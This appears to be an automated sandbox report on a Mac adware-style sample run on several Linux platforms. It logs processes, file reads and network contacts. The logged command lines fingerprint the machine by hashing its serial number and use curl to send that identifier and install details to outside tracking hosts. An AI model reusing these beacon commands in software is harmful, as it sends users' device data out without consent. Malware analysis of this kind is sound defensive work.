Malware Analysis Report

2024-10-24 21:20

Sample ID 240729-jhwypashre
Target 3c6492a33885e363cae2841e0597c730_JaffaCakes118
SHA256 ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
Tags
antivm
score
4/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
4/10

SHA256

ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49

Threat Level: Likely benign

The file 3c6492a33885e363cae2841e0597c730_JaffaCakes118 was found to be: Likely benign.

Malicious Activity Summary

antivm

Checks CPU configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-29 07:40

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-29 07:40

Reported

2024-07-29 10:59

Platform

debian9-mipsbe-20240729-en

Max time kernel

149s

Max time network

146s

Command Line

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

/usr/bin/touch

[touch /root/Library/Application Support/.upd2029]

/usr/bin/openssl

[openssl md5]

/usr/bin/tr

[tr -d \n]

/usr/bin/awk

[awk -F" /IOPlatformSerialNumber/{print $(NF-1)}]

/usr/bin/curl

[curl -s -L http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e]

/bin/date

[date +%Y%m%d%H%M%S]

/bin/mkdir

[mkdir -p /private/tmp/.mmupdatescripts_20240729105900]

/usr/bin/curl

[curl -s --data-urlencode event=upd2029start --data-urlencode click_id=31006619970322272 --data-urlencode c3=(stdin)= d41d8cd98f00b204e9800998ecf8427e --data-urlencode is_root=true --data-urlencode platform_version= --data-urlencode safari_version= --data-urlencode chrome_version= --data-urlencode r4= --data-urlencode domain=request.macmymacupdater.com --data-urlencode webtools_brand=MyCouponsmart --data-urlencode search_domain=www.searchmine.net --data-urlencode webtools_channel=upd-2029 --data-urlencode search_channel= http://client.mm-bq.host/AsyncQueueWorkers/trackQueue.php?p=1]

Network

Country Destination Domain Proto
US 1.1.1.1:53 events.macmymacupdater.com udp
US 161.47.20.33:80 events.macmymacupdater.com tcp
US 1.1.1.1:53 client.mm-bq.host udp
US 35.231.195.62:80 client.mm-bq.host tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-29 07:40

Reported

2024-07-29 11:13

Platform

debian9-mipsel-20240729-en

Max time kernel

149s

Max time network

148s

Command Line

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

/usr/bin/touch

[touch /root/Library/Application Support/.upd2029]

/usr/bin/tr

[tr -d \n]

/usr/bin/awk

[awk -F" /IOPlatformSerialNumber/{print $(NF-1)}]

/usr/bin/openssl

[openssl md5]

/usr/bin/curl

[curl -s -L http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e]

/bin/date

[date +%Y%m%d%H%M%S]

/bin/mkdir

[mkdir -p /private/tmp/.mmupdatescripts_20240729111242]

/usr/bin/curl

[curl -s --data-urlencode event=upd2029start --data-urlencode click_id=31006619970322272 --data-urlencode c3=(stdin)= d41d8cd98f00b204e9800998ecf8427e --data-urlencode is_root=true --data-urlencode platform_version= --data-urlencode safari_version= --data-urlencode chrome_version= --data-urlencode r4= --data-urlencode domain=request.macmymacupdater.com --data-urlencode webtools_brand=MyCouponsmart --data-urlencode search_domain=www.searchmine.net --data-urlencode webtools_channel=upd-2029 --data-urlencode search_channel= http://client.mm-bq.host/AsyncQueueWorkers/trackQueue.php?p=1]

Network

Country Destination Domain Proto
US 1.1.1.1:53 events.macmymacupdater.com udp
US 161.47.20.33:80 events.macmymacupdater.com tcp
US 1.1.1.1:53 client.mm-bq.host udp
US 35.231.195.62:80 client.mm-bq.host tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-29 07:40

Reported

2024-07-29 11:25

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/maps /usr/bin/awk N/A

Processes

/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

/usr/bin/touch

[touch /root/Library/Application Support/.upd2029]

/usr/bin/openssl

[openssl md5]

/usr/bin/tr

[tr -d \n]

/usr/bin/awk

[awk -F" /IOPlatformSerialNumber/{print $(NF-1)}]

/usr/bin/curl

[curl -s -L http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e]

Network

Country Destination Domain Proto
US 1.1.1.1:53 events.macmymacupdater.com udp
US 1.1.1.1:53 events.macmymacupdater.com udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
GB 84.17.50.8:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-29 07:40

Reported

2024-07-29 10:44

Platform

debian9-armhf-20240729-en

Max time kernel

149s

Max time network

1s

Command Line

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Processes

/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118

[/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118]

/usr/bin/touch

[touch /root/Library/Application Support/.upd2029]

/usr/bin/awk

[awk -F" /IOPlatformSerialNumber/{print $(NF-1)}]

/usr/bin/tr

[tr -d \n]

/usr/bin/openssl

[openssl md5]

/usr/bin/curl

[curl -s -L http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e]

Network

Country Destination Domain Proto
US 1.1.1.1:53 events.macmymacupdater.com udp

Files

N/A